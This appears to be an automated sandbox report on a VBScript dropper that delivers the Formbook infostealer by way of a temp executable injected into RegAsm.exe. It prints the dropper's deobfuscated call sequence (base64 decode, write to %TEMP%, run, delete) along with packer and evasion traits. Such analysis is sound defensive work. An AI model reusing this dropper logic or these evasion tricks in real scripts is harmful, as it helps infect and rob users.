Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C80CF2	3_2_02C80CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30CB5	3_2_02D30CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90C00	3_2_02C90C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D09C32	3_2_02D09C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAFDC0	3_2_02CAFDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8ADE0	3_2_02C8ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA8DBF	3_2_02CA8DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C93D40	3_2_02C93D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D41D5A	3_2_02D41D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D47D73	3_2_02D47D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9AD00	3_2_02C9AD00

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 02C7B970 appears 266 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 02CC5130 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 02CD7E54 appears 89 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 02D0F290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 02CFEA12 appears 84 times

Source: TRANSFERENCIAS.vbs

Initial sample: Strings found which are bigger than 50

Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2556886268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2557276095.0000000002A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: temp_executable.exe.0.dr, DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: temp_executable.exe.0.dr, DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: temp_executable.exe.0.dr, AesHelper.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.wscript.exe.1615e473b90.1.raw.unpack, DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.wscript.exe.1615e473b90.1.raw.unpack, DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.wscript.exe.1615e473b90.1.raw.unpack, AesHelper.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.wscript.exe.1615d7c0060.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.wscript.exe.1615d7c0060.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.wscript.exe.1615d7c0060.0.raw.unpack, AesHelper.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.expl.evad.winVBS@5/2@1/1

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Mutant created: NULL

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TRANSFERENCIAS.vbs"

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TRANSFERENCIAS.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe"
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source:	Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: MXCJKSD12.pdb source: wscript.exe, 00000000.00000002.2086216650.000001615D7A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2054204916.000001615D7A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2082243144.000001615D7C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2082427583.000001615D7A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2086853744.000001615E450000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2083593147.000001615D7A7000.00000004.00000020.00020000.00000000.sdmp, temp_executable.exe, 00000002.00000000.2058303544.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, temp_executable.exe.0.dr

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: .Run("C:\Users\user\AppData\Local\Temp\temp_executable.exe", "1", "true");IDictionary.Add("@@", "A");IDictionary.Add("))", "T");IDictionary.Add(";;;", "V");IDictionary.Add("...", "B");IDictionary.Add("&&&", "J");IDictionary.Keys();IDictionary.Item("@@");IDictionary.Item("))");IDictionary.Item(";;;");IDictionary.Item("...");IDictionary.Item("&&&");IXMLDOMNode._00000029("base64");IXMLDOMElement.dataType("bin.base64");IXMLDOMElement.text("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEEAAlBCO8AAAAAAAAAAOAALgELAQYAAMgAAAAKAAAAAAAAvuc");IXMLDOMElement.nodeTypedValue();IFileSystem3.GetSpecialFolder("2");IFolder.Path();_Stream.Type("1");_Stream.Open();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\temp_executable.exe", "2");_Stream.Close();IWshShell3.Run("C:\Users\user\AppData\Local\Temp\temp_executable.exe", "1", "true");IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\temp_executable.exe");IFileSystem3.DeleteFile("C:\Users\user\AppData\Local\Temp\temp_executable.exe")

.NET source code contains method to dynamically call methods (often used by packers)

Source: temp_executable.exe.0.dr, DyyVDbaRvM1YfIq9il.cs	.Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.YDB1IyobTTyUY(16777259)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.YDB1IyobTTyUY(16777260)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.YDB1IyobTTyUY(16777257))})
Source: 0.2.wscript.exe.1615e473b90.1.raw.unpack, DyyVDbaRvM1YfIq9il.cs	.Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.YDB1IyobTTyUY(16777259)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.YDB1IyobTTyUY(16777260)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.YDB1IyobTTyUY(16777257))})
Source: 0.3.wscript.exe.1615d7c0060.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs	.Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.YDB1IyobTTyUY(16777259)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.YDB1IyobTTyUY(16777260)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.YDB1IyobTTyUY(16777257))})

Source: temp_executable.exe.0.dr

Static PE information: 0xEF084109 [Tue Jan 29 10:59:21 2097 UTC]

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004030E0 push eax; ret	3_2_004030E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041488D pushfd ; iretd	3_2_0041488F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00401966 push esi; iretd	3_2_00401967
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00402179 push ss; retf	3_2_0040213D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041F1A0 push ss; ret	3_2_0041F1A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040D4C7 push edx; ret	3_2_0040D514
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040D4CD push edx; ret	3_2_0040D514
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00418DD0 push ebp; ret	3_2_00418DE6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040D589 push edx; ret	3_2_0040D514
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004116BB push edi; retf	3_2_004116BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042373B push es; ret	3_2_004237D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00413FC3 push edi; ret	3_2_00413FCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004237B1 push es; ret	3_2_004237D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C809AD push ecx; mov dword ptr [esp], ecx	3_2_02C809B6

Source: temp_executable.exe.0.dr, DyyVDbaRvM1YfIq9il.cs	High entropy of concatenated method names: 'D4r4O0AxSI', 'YMx1IyBoNY6Ba', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
Source: temp_executable.exe.0.dr, R2mIapWar4cwoqqx6Q.cs	High entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'
Source: 0.2.wscript.exe.1615e473b90.1.raw.unpack, DyyVDbaRvM1YfIq9il.cs	High entropy of concatenated method names: 'D4r4O0AxSI', 'YMx1IyBoNY6Ba', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
Source: 0.2.wscript.exe.1615e473b90.1.raw.unpack, R2mIapWar4cwoqqx6Q.cs	High entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'
Source: 0.3.wscript.exe.1615d7c0060.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs	High entropy of concatenated method names: 'D4r4O0AxSI', 'YMx1IyBoNY6Ba', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
Source: 0.3.wscript.exe.1615d7c0060.0.raw.unpack, R2mIapWar4cwoqqx6Q.cs	High entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Jump to dropped file

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Memory allocated: 2F60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Memory allocated: 31C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Memory allocated: 2FE0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_02CFD1C0 rdtsc

3_2_02CFD1C0

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

API coverage: 0.7 %

